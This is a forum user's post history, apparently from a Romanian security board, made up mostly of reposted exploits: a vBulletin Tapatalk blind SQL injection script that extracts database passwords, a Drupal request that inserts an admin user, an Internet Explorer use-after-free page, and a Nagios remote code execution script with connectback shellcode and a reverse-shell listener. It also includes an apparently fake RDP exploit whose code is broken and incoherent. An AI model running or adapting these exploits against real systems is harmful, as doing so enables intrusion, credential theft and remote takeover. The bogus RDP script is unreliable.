Nytro

Everything posted by Nytro

  1. Vote.
  2. [h=1]A new profession in Romania: cyber security specialist[/h]
     by Liviu Iancu - Mediafax

     A new profession will appear in Romania, that of specialist in the field of cyber security; the job description is currently being drafted and will then be added to the occupational code and given salary standards, Sorin Encuțescu, state counsellor to the prime minister, said on Wednesday.

     "Our concern at this moment is that institutions have specialised people who can work as competently as possible in this field. That is why, along with the development of the system of institutional responsibilities, work is currently under way, including on the job descriptions under which they are to be employed, so that we are able to create in Romania, and to put into the occupational code, the position of specialist in the field of cyber security. This new profession must be recognised and must be introduced into the Romanian occupational code, on which basis we can also set salary standards," Encuțescu said at a seminar organised by the UTI group.

     He pointed out that a new component has been introduced into the national security industry strategy: developing and supporting the public and state-owned economic operators that work in the field of cyber security. "In practice, at this moment the strategy contains a component that refers to encouraging small and medium-sized enterprises and start-ups in the field of cyber security. We support and encourage the creation of such companies," Encuțescu added. The counsellor mentioned that the state intends to grant tax incentives to companies that invest in cyber security.

     Teodor Cimpoeșu, director at certSIGN, the cyber security company within UTI, said that in Romania cyber attacks are carried out not only by Romanians but also by foreigners. "It is a threat, on the one hand, to the individual internet user, from the simple fact of having their login data and social network accounts stolen, up to having their banking data or even the money in their account stolen. For companies it is more serious, because the IT infrastructure they run their business on can be affected," Cimpoeșu added.

     Source: A new profession in Romania: cyber security specialist - Mediafax
  3. [h=1]vBulletin Tapatalk - Blind SQL Injection[/h]

#!/usr/bin/env python
# -*- coding: utf-8 -*-
'''
@author: tintinweb 0x721427D8
'''
import urllib2, urllib
import xmlrpclib, re, string, itertools, time
from distutils.version import LooseVersion


class Exploit(object):
    def __init__(self, target, debug=0):
        self.stopwatch_start = time.time()
        self.target = target
        self.path = target
        self.debug = debug
        if not self.target.endswith("mobiquo.php"):
            self.path = self.detect_tapatalk()
        if not self.path:
            raise Exception("Could not detect tapatalk or version not supported!")
        self.rpc_connect()
        self.attack_func = self.attack_2

    def detect_tapatalk(self):
        # request page, check for tapatalk banner
        handlers = [
            urllib2.HTTPHandler(debuglevel=self.debug),
            urllib2.HTTPSHandler(debuglevel=self.debug),
        ]
        ua = urllib2.build_opener(*handlers)
        ua.addheaders = [('User-agent', 'Mozilla/5.0 (iPhone; CPU iPhone OS 5_0 like Mac OS X) AppleWebKit/534.46 (KHTML, like Gecko) Version/5.1 Mobile/9A334 Safari/7534.48.3')]
        data = ua.open(self.target).read()
        if self.debug:
            print data
        if not "tapatalkDetect()" in data:
            print "[xx] could not detect tapatalk. bye..."
            return None
        # extract tapatalk version
        print "[ i] Taptalk detected ... ",
        path = "".join(re.findall(r"^\s*<link href=[\s'\"]?(http://.*?/)smartbanner/appbanner.css", data, re.MULTILINE | re.DOTALL))
        path += "mobiquo.php"
        print "'%s' ... " % path,
        data = urllib.urlopen(path).read()
        version = "".join(re.findall(r"Current Tapatalk plugin version:\s*([\d\.a-zA-Z]+)", data))
        if LooseVersion(version) <= LooseVersion("5.2.1"):
            print "v.%s - OK" % version
            return path
        print "v.%s - not vulnerable" % version
        return None

    def rpc_connect(self):
        self.rpc = xmlrpclib.ServerProxy(self.path, verbose=self.debug)

    def attack_1(self, sqli, sleep=2):
        '''
        SELECT subscribethreadid FROM subscribethread AS subscribethread
        LEFT JOIN user AS user ON (user.userid=subscribeforum.userid)
        WHERE subscribethreadid = <INJECTION> AND subscribethreadid.userid = 0";

        <INJECTION>: 1 UNION ALL <select_like_probe> OR FALSE
        '''
        query = "-1 union %s and ( select sleep(%s) ) " % (sqli, sleep)
        query += "union select subscribethreadid from subscribethread where 1=1 OR 1=1"  # fix query for "AND subscribeforum.userid=0"
        if self.debug:
            print """
            SELECT subscribethreadid FROM subscribethread AS subscribethread
            LEFT JOIN user AS user ON (user.userid=subscribethread.userid)
            WHERE subscribethreadid = %s AND subscribethread.userid = 0""" % query
        return self.rpc.unsubscribe_topic("s_%s" % query)  # no escape, invalid_char="_"

    def attack_2(self, sqli, sleep=2):
        '''
        SELECT subscribeforumid FROM subscribeforum AS subscribeforum
        LEFT JOIN user AS user ON (user.userid=subscribeforum.userid)
        WHERE subscribeforumid = <INJECTION> AND subscribeforum.userid = 0";

        <INJECTION>: 1 UNION ALL <select_like_probe> OR FALSE
        '''
        query = "-1 union %s and ( select sleep(%s) ) " % (sqli, sleep)
        query += "union select subscribeforumid from subscribeforum where 1=1 OR 1=1"  # fix query for "AND subscribeforum.userid=0"
        if self.debug:
            print """
            SELECT subscribeforumid FROM subscribeforum AS subscribeforum
            LEFT JOIN user AS user ON (user.userid=subscribeforum.userid)
            WHERE subscribeforumid = %s AND subscribeforum.userid = 0""" % query
        return self.rpc.unsubscribe_forum("s_%s" % query)  # no escape, invalid_char="_"

    def attack_blind(self, sqli, sleep=2):
        return self.attack_func(sqli, sleep=sleep)
        #return self.attack_func("-1 OR subscribethreadid = ( %s AND (select sleep(4)) ) UNION SELECT 'aaa' FROM subscribethread WHERE subscribethreadid = -1 OR 1 "%sqli)

    def attack_blind_guess(self, query, column, charset=string.ascii_letters + string.digits, maxlength=32, sleep=2, case=True):
        '''
        provide <query> = select -1 from user where user='debian-sys-maint' where <COLUMN> <GUESS>
        '''
        hit = False
        # PHASE 1 - guess entry length
        print "[   ] trying to guess length ..."
        for guess_length in xrange(maxlength + 1):
            q = query.replace("<COLUMN>", "length(%s)" % column).replace("<GUESS>", "= %s" % guess_length)
            self.stopwatch()
            self.attack_blind(q, sleep)
            duration = self.stopwatch()
            print ".",
            if duration >= sleep - sleep / 8:
                # HIT! - got length! => guess_length
                hit = True
                print ""
                break
        if not hit:
            print "[ !!] unable to guess password length, check query!"
            return None
        print "[  *] LENGTH = %s" % guess_length

        # PHASE 2 - guess password up to length
        print "[   ] trying to guess value ..."
        hits = 0
        result = ""
        for pos in xrange(guess_length):                    # for each char pos in up to guessed length
            for attempt in self.bruteforce(charset, 1):     # probe all chars in charset
                #attempt = re.escape(attempt)
                if attempt == "%%":
                    attempt = "\%"
                # LIKE binary = case sensitive. might be better to do caseinsensitive search + recheck case with binary
                q = query.replace("<COLUMN>", column).replace("<GUESS>", "LIKE '%s%s%%' " % (result, attempt))
                self.stopwatch()
                self.attack_blind(q, sleep)
                duration = self.stopwatch()
                #print result,attempt," ",duration
                print ".",
                if duration >= sleep - sleep / 8:
                    if case:
                        # case insensitive hit - recheck case: this is drastically reducing queries needed.
                        q = query.replace("<COLUMN>", column).replace("<GUESS>", "LIKE binary '%s%s%%' " % (result, attempt.lower()))
                        self.stopwatch()
                        self.attack_blind(q, sleep)
                        duration = self.stopwatch()
                        if duration >= sleep - sleep / 8:
                            attempt = attempt.lower()
                        else:
                            attempt = attempt.upper()
                        # case sensitive - end
                    # HIT! - got length! => guess_length
                    hits += 1
                    print ""
                    print "[  +] HIT! - %s[%s].." % (result, attempt)
                    result += attempt
                    break
        if not hits == guess_length:
            print "[ !!] unable to guess password length, check query!"
            return None
        print "[  *] SUCCESS!: query: %s" % (query.replace("<COLUMN>", column).replace("<GUESS>", "='%s'" % result))
        return result

    def bruteforce(self, charset, maxlength):
        return (''.join(candidate)
                for candidate in itertools.chain.from_iterable(itertools.product(charset, repeat=i)
                                                                for i in range(1, maxlength + 1)))

    def stopwatch(self):
        stop = time.time()
        diff = stop - self.stopwatch_start
        self.stopwatch_start = stop
        return diff


if __name__ == "__main__":
    #googledork: https://www.google.at/search?q=Tapatalk+Banner+head+start
    DEBUG = False
    TARGET = "http://TARGET/vbb4/forum.php"

    x = Exploit(TARGET, debug=DEBUG)
    print "[   ] TAPATALK for vBulletin 4.x - SQLi"
    print "[--] Target: %s" % TARGET
    if DEBUG:
        print "[--] DEBUG-Mode!"

    print "[  +] Attack - sqli"
    query = u"-1 UNION SELECT 1%s" % unichr(0)
    if DEBUG:
        print u"""
        SELECT subscribeforumid FROM subscribeforum AS subscribeforum
        LEFT JOIN user AS user ON (user.userid=subscribeforum.userid)
        WHERE subscribeforumid = %s AND subscribeforum.userid = 0""" % query

    print "[  *] guess mysql user/pass"
    print x.attack_blind_guess("select -1 from mysql.user where user='root' and <COLUMN> <GUESS>",
                               column="password", charset="*" + string.hexdigits, maxlength=45)  # usually 40 chars + 1
    print "[  *] guess apikey"
    print x.attack_blind_guess("select -1 from setting where varname='apikey' and <COLUMN> <GUESS>",
                               column='value', charset=string.ascii_letters + string.digits, maxlength=14, )
    print "-- done --"

     Source: vBulletin Tapatalk - Blind SQL Injection
  4. I'll join too if 2 more people volunteer.
  5. FindWindow, FindWindowEx, GetWindowRect. There are many Windows functions you can use: Window Functions (Windows). I don't know what AutoIT offers you, though.
  6. [h=1]Drupal CVE-2014-3704 insert new user[/h]

POST /drupal/?q=node&destination=node HTTP/1.1
TE: deflate,gzip;q=0.3
Connection: TE, close
Host: 192.168.88.88
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.9.2a1pre) Gecko
Content-Type: application/x-www-form-urlencoded
Content-Length: 258

name[0%20;insert+into+users+%28uid%2cname%2cpass%2cstatus%29+values+%28123456%2c'greenbull'%2c'$S$DkH0O9Lpt5i1oUi9yYeouLW0ZCAHo/u75ReE1zjCPaPbZoVZQX/m'%2c1%29;;#%20%20]=nTzlWXKY&name[0]=ptSHbjbW&pass=o81NgWxc&form_build_id=&form_id=user_login_block&op=Log+in

  7. You can use the "Free stuff" category if you want to give something away. Give it to whoever you want, by whatever criteria you want. Good luck!
  8. Whoa: http://www.vbulletin.com/forum/forum/vbulletin-announcements/vbulletin-announcements_aa/4182969-security-patch-release-for-vbulletin-connect-5-0-0-5-1-4
  9. Whoa: http://www.vbulletin.com/forum/forum/vbulletin-announcements/vbulletin-announcements_aa/4183258-security-exploit-fixed-in-vbulletin-4-2-2-and-4-2-3
  10. I want to see 20-30 things that you donate before you give your opinion.
  11. Friday is OWASP. See you there.
  12. There are a few useful things, but nothing special. Other interesting forums are: opensc, trojanforge, rohitab, tuts4you, kernelmode and many others. And @giv's reversing.ro.
  13. CCleaner Pro Patching Tut by Kjacky. Home Page: http://www.piriform.com/ Tutorial: CCP. Source: EXETOOLS FORUM
  14. CVE-2014-1815 Html code - Internet Explorer 6-11

CVE-2014-1815 Html code

<!doctype html>
<html>
<head>
<meta http-equiv="Cache-Control" content="no-cache"/>
<script>
function stc()
{
    var Then = new Date();
    Then.setTime(Then.getTime() + 1000 * 3600 * 24 * 7 );
    document.cookie = "Cookie1=d93kaj3Nja3; expires="+ Then.toGMTString();
}
function cid()
{
    var swf = 0;
    try {
        swf = new ActiveXObject('ShockwaveFlash.ShockwaveFlash'); } catch (e) {
    }
    if (!swf)
        return 0;
    var cookieString = new String(document.cookie);
    if(cookieString.indexOf("d93kaj3Nja3") == -1)
    {stc(); return 1;}else{ return 0;}
}
String.prototype.repeat=function (i){return new Array(isNaN(i)?1:++i).join(this);}
var tpx=unescape("%u1414%u1414").repeat(0x60/4-1);
var ll=new Array();
for (i=0;i<3333;i++)ll.push(document.createElement("img"));
for(i=0;i<3333;i++) ll[i].className=tpx;
for(i=0;i<3333;i++) ll[i].className="";
CollectGarbage();
function b2()
{
    try{xdd.replaceNode(document.createTextNode(" "));}catch(exception){}
    try{xdd.outerText='';}catch(exception){}
    CollectGarbage();
    for(i=0;i<3333;i++) ll[i].className=tpx;
}
function a1(){
    if (!cid())
        return;
    document.body.contentEditable="true";
    try{xdd.applyElement(document.createElement("frameset"));}catch(exception){}
    try{document.selection.createRange().select();}catch(exception){}
}
</script>
</head>
<body onload='setTimeout("a1();",2000);' onresize=b2()>
<marquee id=xdd ></marquee>
<object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" width="1%" height="1%" id="FE">
<param name="movie" value="storm.swf" />
<param name="quality" value="high" />
<param name="bgcolor" value="#ffffff" />
<param name="allowScriptAccess" value="sameDomain" />
<param name="allowFullScreen" value="true" />
</object>
</body>
<body>
<form name=loading>
  <p align=center><font color="#0066ff" size="2">Loading....,Please Wait</font><font color="#0066ff" size="2" face="verdana">...</font>
    <input type=text name=chart size=46 style="font-family:verdana; font-weight:bolder; color:#0066ff; background-color:#fef4d9; padding:0px; border-style:none;">

    <input type=text name=percent size=47 style="color:#0066ff; text-align:center; border-width:medium; border-style:none;">
    <script>
var bar=0
var line="||"
var amount="||"
count()
function count(){
    bar=bar+2
    amount =amount + line
    document.loading.chart.value=amount
    document.loading.percent.value=bar+"%"
    if (bar<99)
    {setTimeout("count()",500);}
    else
    {window.location = "http://www.google.com.hk";}
}</script>
  </p>
</form>
<p align="center">Wart,<a style="text-decoration: none" href="http://www.google.com.hk"><font color="#FF0000">kick me</font></a>.</p>
</body>
</html>

     Source: CVE-2014-1815 Html code - Pastebin.com
  15. CVE-2012-6096 - Nagios history.cgi Remote Command Execution

#!/usr/bin/python
#
# CVE-2012-6096 - Nagios history.cgi Remote Command Execution
# ===========================================================
# Another year, another reincarnation of classic and trivial
# bugs to exploit. This time we attack Nagios.. or more
# specifically, one of its CGI scripts. [1]
#
# The Nagios code is an amazing monster. It reminds me a
# lot of some of my early experiments in C, back when I
# still had no clue what I was doing. (Ok, fair enough,
# I still don't, heheh.)
#
# Ok, I'll come clean. This exploit doesn't exactly
# defeat FORTIFY. This approach is likely to work just FINE
# on other crippled distro's though, think of stuff like
# ArchLinux, Slackware, and all those Gentoo kids twiddling
# their CFLAGS. [2] (Oh and hey, BSD and stuff!)
#
# I do some very stupid shit(tm) here that might make an
# exploit coder or two cringe. My sincere apologies for that.
#
# Cold beer goes out to my friends who are still practicing
# this dying but interesting type of art:
#
# * brainsmoke * masc * iZsh * skier_ * steve *
#
# -- blasty <blasty@fail0verflow.com> / 2013-01-08
#
# References:
# [1] http://permalink.gmane.org/gmane.comp.security.oss.general/9109
# [2] http://www.funroll-loops.info/
#
# P.S. To the clown who rebranded my Samba exploit: j00 s0 1337 m4n!
# Next time you rebrand an exploit at least show some diligence and
# add some additional targets or improvements, so we can all profit!
#
# P.P.S. hey, Im not _burning_ bugs .. this is a 2day, enjoy!
#

import os, sys, socket, struct, urllib, threading, SocketServer, time
from base64 import b64encode

SocketServer.TCPServer.allow_reuse_address = True

targets = [
    {
        "name"       : "Debian (nagios3_3.0.6-4~lenny2_i386.deb)",
        "smash_len"  : 0xc37,
        "unescape"   : 0x0804b620,
        "popret"     : 0x08048fe4,
        "hostbuf"    : 0x080727a0,
        "system_plt" : 0x08048c7c
    }
]

def u32h(v):
    return struct.pack("<L", v).encode('hex')

def u32(v, hex = False):
    return struct.pack("<L", v)

# Tiny ELF stub based on:
# http://www.muppetlabs.com/~breadbox/software/tiny/teensy.html
def make_elf(sc):
    elf_head = \
        "7f454c46010101000000000000000000" + \
        "02000300010000005480040834000000" + \
        "00000000000000003400200001000000" + \
        "00000000010000000000000000800408" + \
        "00800408" + u32h(0x54+len(sc))*2 + \
        "0500000000100000"
    return elf_head.decode("hex") + sc

# interactive connectback listener
class connectback_shell(SocketServer.BaseRequestHandler):
    def handle(self):
        print "\n[!!] K4P0W!@# -> shell from %s" % self.client_address[0]
        print "[**] This shell is powered by insane amounts of illegal substances"
        s = self.request
        import termios, tty, select, os
        old_settings = termios.tcgetattr(0)
        try:
            tty.setcbreak(0)
            c = True
            os.write(s.fileno(), "id\nuname -a\n")
            while c:
                for i in select.select([0, s.fileno()], [], [], 0)[0]:
                    c = os.read(i, 1024)
                    if c:
                        if i == 0:
                            os.write(1, c)
                        os.write(s.fileno() if i == 0 else 1, c)
        except KeyboardInterrupt:
            pass
        finally:
            termios.tcsetattr(0, termios.TCSADRAIN, old_settings)
        return

class ThreadedTCPServer(SocketServer.ThreadingMixIn, SocketServer.TCPServer):
    pass

if len(sys.argv) != 5:
    print "\n  >> Nagios 3.x CGI remote code execution by <blasty@fail0verflow.com>"
    print "  >> \"Jetzt geht's Nagi-los!\"\n"
    print "  usage: %s <base_uri> <myip> <myport> <target>\n" % (sys.argv[0])
    print "  targets:"
    i = 0
    for target in targets:
        print "    %02d) %s" % (i, target['name'])
        i = i+1
    print ""
    sys.exit(-1)

# the original compared with '>' here, which let target_no == len(targets)
# through and raised an IndexError below; '>=' is the intended bound check
target_no = int(sys.argv[4])
if target_no < 0 or target_no >= len(targets):
    print "Invalid target specified"
    sys.exit(-1)

target = targets[ int(sys.argv[4]) ]

# comment this shit if you want to setup your own listener
server = ThreadedTCPServer((sys.argv[2], int(sys.argv[3])), connectback_shell)
server_thread = threading.Thread(target=server.serve_forever)
server_thread.daemon = True
server_thread.start()

# shellcode to be executed
# vanilla x86/linux connectback written by a dutch gentleman
# close to a decade ago.
cback = \
    "31c031db31c951b10651b10151b10251" + \
    "89e1b301b066cd8089c231c031c95151" + \
    "68badc0ded6668b0efb102665189e7b3" + \
    "1053575289e1b303b066cd8031c939c1" + \
    "740631c0b001cd8031c0b03f89d3cd80" + \
    "31c0b03f89d3b101cd8031c0b03f89d3" + \
    "b102cd8031c031d250686e2f7368682f" + \
    "2f626989e3505389e1b00bcd8031c0b0" + \
    "01cd80"

cback = cback.replace("badc0ded", socket.inet_aton(sys.argv[2]).encode("hex"))
cback = cback.replace("b0ef", struct.pack(">H", int(sys.argv[3])).encode("hex"))

# Eww.. so there's some characters that dont survive the trip..
# yes, even with the unescape() call in our return-chain..
# initially I was going to use some /dev/tcp based connectback..
# but /dev/tcp isn't available/accesible everywhere, so instead
# we drop an ELF into /tmp and execute that. The '>' characters
# also doesn't survive the trip so we work around this by using
# the tee(1) utility.
# If your target has a /tmp that is mounted with noexec flag,
# is severely firewalled or guarded by trained (watch)dogs..
# you might want to reconsider this approach!
cmd = \
    "rm -rf /tmp/x;" + \
    "echo " + b64encode(make_elf(cback.decode('hex'))) + "|" + \
    "base64 -d|tee /tmp/x|chmod +x /tmp/x;/tmp/x;"

# Spaces (0x20) are also a problem, they always ends up as '+'
# so apply some olde trick and rely on $IFS for argv separation
cmd = cmd.replace(" ", "${IFS}")

# Basic return-2-whatever/ROP chain.
# We return into cgi_input_unescape() to get rid of
# URL escaping in a static buffer we control, and then
# we return into system@plt for the moneyshot.
#
# Ergo sum:
# There's no memoryleak or whatever needed to leak libc
# base and bypass ASLR.. This entire Nagios PoS is stringed
# together by system() calls, so pretty much every single one
# of their little silly binaries comes with a PLT entry for
# system(), huzzah!
rop = [
    u32(target['unescape']),
    u32(target['popret']),
    u32(target['hostbuf']),
    u32(target['system_plt']),
    u32(0xdeafbabe),
    u32(target['hostbuf'])
]

# Yes.. urllib, so it supports HTTPS, basic-auth and whatnot
# out of the box. Building HTTP requests from scratch is so 90ies..
params = urllib.urlencode({
    'host' : cmd + "A"*(target['smash_len']-len(cmd)) + "".join(rop)
})

print "[>>] CL1Q .."
f = urllib.urlopen(sys.argv[1]+"/cgi-bin/history.cgi?%s" % params)
print "[>>] CL4Q .."
f.read()

# TRIAL PERIOD ACTIVE, LOL!
time.sleep(0x666)
server.shutdown()

     Source: [Python] CVE-2012-6096 exploit - Pastebin.com
  16. CVE-2012-0002 - Remote Desktop Protocol (RDP)

#!/usr/bin/env python
#############################################################################
# MS12-020 Exploit by Sabu
# sabu@fbi.gov
# Uses FreeRDP
#############################################################################

import struct
import sys
from freerdp import rdpRdp
from freerdp import crypto
from freerdp.rdpRdp import rdpNego

#bind shellcode TCP port 4444
shellcode = '\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90'
shellcode += '\x29\xc9\x83\xe9\xb0\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76\x0e\xe9'
shellcode += '\x4a\xb6\xa9\x83\xee\xfc\xe2\xf4\x15\x20\x5d\xe4\x01\xb3\x49\x56'
shellcode += '\x16\x2a\x3d\xc5\xcd\x6e\x3d\xec\xd5\xc1\xca\xac\x91\x4b\x59\x22'
shellcode += '\xa6\x52\x3d\xf6\xc9\x4b\x5d\xe0\x62\x7e\x3d\xa8\x07\x7b\x76\x30'
shellcode += '\x45\xce\x76\xdd\xee\x8b\x7c\xa4\xe8\x88\x5d\x5d\xd2\x1e\x92\x81'
shellcode += '\x9c\xaf\x3d\xf6\xcd\x4b\x5d\xcf\x62\x46\xfd\x22\xb6\x56\xb7\x42'
shellcode += '\xea\x66\x3d\x20\x85\x6e\xaa\xc8\x2a\x7b\x6d\xcd\x62\x09\x86\x22'
shellcode += '\xa9\x46\x3d\xd9\xf5\xe7\x3d\xe9\xe1\x14\xde\x27\xa7\x44\x5a\xf9'
shellcode += '\x16\x9c\xd0\xfa\x8f\x22\x85\x9b\x81\x3d\xc5\x9b\xb6\x1e\x49\x79'
shellcode += '\x81\x81\x5b\x55\xd2\x1a\x49\x7f\xb6\xc3\x53\xcf\x68\xa7\xbe\xab'
shellcode += '\xbc\x20\xb4\x56\x39\x22\x6f\xa0\x1c\xe7\xe1\x56\x3f\x19\xe5\xfa'
shellcode += '\xba\x19\xf5\xfa\xaa\x19\x49\x79\x8f\x22\xa7\xf5\x8f\x19\x3f\x48'
shellcode += '\x7c\x22\x12\xb3\x99\x8d\xe1\x56\x3f\x20\xa6\xf8\xbc\xb5\x66\xc1'
shellcode += '\x4d\xe7\x98\x40\xbe\xb5\x60\xfa\xbc\xb5\x66\xc1\x0c\x03\x30\xe0'
shellcode += '\xbe\xb5\x60\xf9\xbd\x1e\xe3\x56\x39\xd9\xde\x4e\x90\x8c\xcf\xfe'
shellcode += '\x16\x9c\xe3\x56\x39\x2c\xdc\xcd\x8f\x22\xd5\xc4\x60\xaf\xdc\xf9'
shellcode += '\xb0\x63\x7a\x20\x0e\x20\xf2\x20\x0b\x7b\x76\x5a\x43\xb4\xf4\x84'
shellcode += '\x17\x08\x9a\x3a\x64\x30\x8e\x02\x42\xe1\xde\xdb\x17\xf9\xa0\x56'
shellcode += '\x9c\x0e\x49\x7f\xb2\x1d\xe4\xf8\xb8\x1b\xdc\xa8\xb8\x1b\xe3\xf8'
shellcode += '\x16\x9a\xde\x04\x30\x4f\x78\xfa\x16\x9c\xdc\x56\x16\x7d\x49\x79'
shellcode += '\x62\x1d\x4a\x2a\x2d\x2e\x49\x7f\xbb\xb5\x66\xc1\x19\xc0\xb2\xf6'
shellcode += '\xba\xb5\x60\x56\x39\x4a\xb6\xa9'

#Payload
payload = '\x41\x00\x5c\x00'
payload += '\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49'
payload += '\x49\x49\x49\x49\x49\x49\x49\x49\x49\x37\x49\x49\x51\x5a\x6a\x68'
payload += '\x58\x30\x41\x31\x50\x42\x41\x6b\x42\x41\x78\x42\x32\x42\x41\x32'
payload += '\x41\x41\x30\x41\x41\x58\x38\x42\x42\x50\x75\x4b\x59\x49\x6c\x43'
payload += '\x5a\x7a\x4b\x32\x6d\x5a\x48\x5a\x59\x69\x6f\x4b\x4f\x39\x6f\x71'
payload += '\x70\x6e\x6b\x62\x4c\x44\x64\x71\x34\x4c\x4b\x62\x65\x75\x6c\x4c'
payload += '\x4b\x63\x4c\x76\x65\x70\x78\x35\x51\x48\x6f\x6c\x4b\x50\x4f\x74'
payload += '\x58\x6e\x6b\x33\x6f\x55\x70\x37\x71\x48\x6b\x57\x39\x6c\x4b\x66'
payload += '\x54\x6e\x6b\x46\x61\x7a\x4e\x47\x41\x6b\x70\x7a\x39\x4c\x6c\x4c'
payload += '\x44\x6f\x30\x62\x54\x44\x47\x38\x41\x4b\x7a\x54\x4d\x44\x41\x4b'
payload += '\x72\x78\x6b\x39\x64\x35\x6b\x53\x64\x75\x74\x46\x48\x72\x55\x79'
payload += '\x75\x6c\x4b\x53\x6f\x76\x44\x44\x41\x48\x6b\x35\x36\x4e\x6b\x54'
payload += '\x4c\x30\x4b\x6c\x4b\x51\x4f\x65\x4c\x65\x51\x38\x6b\x77\x73\x36'
payload += '\x4c\x4e\x6b\x6e\x69\x30\x6c\x66\x44\x45\x4c\x30\x61\x69\x53\x30'
payload += '\x31\x79\x4b\x43\x54\x6c\x4b\x63\x73\x44\x70\x4e\x6b\x77\x30\x66'
payload += '\x6c\x6c\x4b\x72\x50\x45\x4c\x4c\x6d\x4e\x6b\x73\x70\x64\x48\x73'
payload += '\x6e\x55\x38\x6e\x6e\x32\x6e\x34\x4e\x58\x6c\x62\x70\x39\x6f\x6b'
payload += '\x66\x70\x66\x61\x43\x52\x46\x71\x78\x30\x33\x55\x62\x63\x58\x63'
payload += '\x47\x34\x33\x65\x62\x41\x4f\x30\x54\x39\x6f\x4a\x70\x52\x48\x5a'
payload += '\x6b\x38\x6d\x6b\x4c\x75\x6b\x30\x50\x6b\x4f\x6e\x36\x53\x6f\x6f'
payload += '\x79\x4a\x45\x32\x46\x6f\x71\x6a\x4d\x34\x48\x77\x72\x73\x65\x73'
payload += '\x5a\x37\x72\x69\x6f\x58\x50\x52\x48\x4e\x39\x76\x69\x4a\x55\x4c'
payload += '\x6d\x32\x77\x69\x6f\x59\x46\x50\x53\x43\x63\x41\x43\x70\x53\x70'
payload += '\x53\x43\x73\x50\x53\x62\x63\x70\x53\x79\x6f\x6a\x70\x35\x36\x61'
payload += '\x78\x71\x32\x78\x38\x71\x76\x30\x53\x4b\x39\x69\x71\x4d\x45\x33'
payload += '\x58\x6c\x64\x47\x6a\x74\x30\x5a\x67\x43\x67\x79\x6f\x39\x46\x32'
payload += '\x4a\x56\x70\x66\x31\x76\x35\x59\x6f\x58\x50\x32\x48\x4d\x74\x4e'
payload += '\x4d\x66\x4e\x7a\x49\x50\x57\x6b\x4f\x6e\x36\x46\x33\x56\x35\x39'
payload += '\x6f\x78\x50\x33\x58\x6b\x55\x51\x59\x4e\x66\x50\x49\x51\x47\x39'
payload += '\x6f\x48\x56\x32\x70\x32\x74\x62\x74\x46\x35\x4b\x4f\x38\x50\x6e'
payload += '\x73\x55\x38\x4d\x37\x71\x69\x69\x56\x71\x69\x61\x47\x6b\x4f\x6e'
payload += '\x36\x36\x35\x79\x6f\x6a\x70\x55\x36\x31\x7a\x71\x74\x32\x46\x51'
payload += '\x78\x52\x43\x70\x6d\x4f\x79\x4d\x35\x72\x4a\x66\x30\x42\x79\x64'
payload += '\x69\x7a\x6c\x4b\x39\x48\x67\x62\x4a\x57\x34\x4f\x79\x6d\x32\x37'
payload += '\x41\x6b\x70\x7a\x53\x6e\x4a\x69\x6e\x32\x62\x46\x4d\x6b\x4e\x70'
payload += '\x42\x44\x6c\x4c\x53\x6e\x6d\x31\x6a\x64\x78\x4c\x6b\x4e\x4b\x4e'
payload += '\x4b\x43\x58\x70\x72\x69\x6e\x6d\x63\x37\x66\x79\x6f\x63\x45\x73'
payload += '\x74\x4b\x4f\x7a\x76\x63\x6b\x31\x47\x72\x72\x41\x41\x50\x51\x61'
payload += '\x41\x70\x6a\x63\x31\x41\x41\x46\x31\x71\x45\x51\x41\x4b\x4f\x78'
payload += '\x50\x52\x48\x4c\x6d\x79\x49\x54\x45\x38\x4e\x53\x63\x6b\x4f\x6e'
payload += '\x36\x30\x6a\x49\x6f\x6b\x4f\x70\x37\x4b\x4f\x4e\x30\x4e\x6b\x30'
payload += '\x57\x69\x6c\x6b\x33\x4b\x74\x62\x44\x79\x6f\x6b\x66\x66\x32\x6b'
payload += '\x4f\x4e\x30\x53\x58\x58\x70\x4e\x6a\x55\x54\x41\x4f\x52\x73\x4b'
payload += '\x4f\x69\x46\x4b\x4f\x6e\x30\x68';

class SRVSVC_Exploit(Thread):
    def __init__(self, target, port=3389):
        super(SRVSVC_Exploit, self).__init__()
        self.__port = port
        self.target = target

    def __DCEPacket(self):
        print '[-]Connecting'
        self.__trans = rdp.transport.cert('rdp_np:%s\\x00\\x89]' % self.target)
        self.__trans.connect()
        print '[-]connected' % self.target

        # Making teh packet
        self.__stub='\x01\x00\x00\x00'
        self.__stub+='\xd6\x00\x00\x00\x00\x00\x00\x00\xd6\x00\x00\x00'
        self.__stub+=shellcode
        self.__stub+='\x41\x41\x41\x41\x41\x41\x41\x41'
        self.__stub+='\x41\x41\x41\x41\x41\x41\x41\x41'
        self.__stub+='\x41\x41\x41\x41\x41\x41\x41\x41'
        self.__stub+='\x41\x41\x41\x41\x41\x41\x41\x41'
        self.__stub+='\x41\x41\x41\x41\x41\x41\x41\x41'
        self.__stub+='\x41\x41\x41\x41\x41\x41\x41\x41'
        self.__stub+='\x41\x41\x41\x41\x41\x41\x41\x41'
        self.__stub+='\x41\x41\x41\x41\x41\x41\x41\x41'
        self.__stub+='\x00\x00\x00\x00'
        self.__stub+='\x2f\x00\x00\x00\x00\x00\x00\x00\x2f\x00\x00\x00'
        self.__stub+=payload
        self.__stub+='\x00\x00\x00\x00'
        self.__stub+='\x02\x00\x00\x00\x02\x00\x00\x00'
        self.__stub+='\x00\x00\x00\x00\x02\x00\x00\x00'
        self.__stub+='\x5c\x00\x00\x00\x01\x00\x00\x00'
        self.__stub+='\x01\x00\x00\x00\x90\x90\xb0\x53\x6b\xC0\x28\x03\xd8\xff\xd3'
        return

    def run(self):
        self.__DCEPacket()
        self.__dce.call(0x1f, self.__stub)
        print '[-]Exploit successfull!...\nTelnet to port 4444 on target machine.'

if __name__ == '__main__':
    target = sys.argv[1]
    print '\nUsage: %s <target ip> \n' % sys.argv[0]
    sys.exit(-1)
    current = SRVSVC_Exploit(target)
    current.start()

     Note: this crappy syntax highlighter throws in random spaces. Get it from the source.
     Source: [Python] CVE-2012-0002 - Pastebin.com
  17. [h=1]CVE-2014-0556[/h]
     By: hdarwin on Sep 27th, 2014 (edited)

/*
<html>
<head>
<title>CVE-2014-0556</title>
</head>
<body>
<object id="swf" width="100%" height="100%" data="NewProject.swf" type="application/x-shockwave-flash"></object><br>
<button onclick="swf.exploit()">STOP</button>
</body>
</html>
*/

/*
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
